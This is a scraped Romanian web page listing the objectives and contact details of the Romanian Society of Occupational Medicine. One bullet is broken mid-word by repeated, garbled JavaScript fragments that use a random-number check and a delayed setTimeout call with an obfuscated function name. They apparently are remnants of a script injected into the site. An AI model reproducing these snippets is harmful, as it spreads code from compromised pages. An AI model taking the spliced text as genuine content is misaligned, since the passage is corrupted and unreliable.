Bucureşti , sector 3
Email: office@srmedicina-muncii.ro
Cod fiscal: 16571712
IBAN: RO77 BTRL 0440 1205 N012 73XX
Banca Transilvania

Web design: Dezibel Media // Web hosting: Web Hotel // A.N.P.C.

Obiective

Societatea romana de medicina a muncii

www.srmedicina-muncii.ro

 • Societatea Română de Medicina Muncii îşi propune:
 • să ridice nivelul ştiinţific al membrilor săi;
 • să instruiască şi să disemineze cunoştinţele în domeniul medicinii muncii şi al promovării sănătăţii la locul de muncă;
 • să dezvolte cercetarea ştiinţifică în domeniul medicinii muncii;
 • să promoveze specialitatea şi interesele medicilor de medicina muncii;
 • dezvolte standom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout(#(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andarde de bună practică în domeniul medicinii muncii;
 • să colaboreze cu Comisiile de Specialitate în Medicina Muncii ale Ministerului Sănătăţii, Colegiului Medicilor din România şi alte instituţii guvernamentale în elaborarea legislaţiei din domeniul sănătăţii ocupaţionale;
 • formeze parteneriate sau alte forme de colaborare, după caz, cu societăţi medicale din ţară şi din străinătate;
 • să asigure schimbul de experienţă al profesioniştilor din activitatea de sănătate şi securitate în muncă;
 • să sprijine apărarea intereselor specialiştilor din activitatea de sănătate şi securitate în muncă;
 • contribuie la îmbunătăţirea legislaţiei în domeniul securităţii şi sănătăţii în muncă.

Societatea Română de Medicina Muncii are personalitate juridică, fiind deplin autonomă din punct de vedere structural, funcţional şi economic. SRMM decide asupra întregii activităţi interne şi externe, asupra planului de manifestări ştiinţifice, participări la manifestări ştiinţifice în ţară şi străinătate, înfiinţări de publicaţii medicale, afilieri la organisme internaţionale.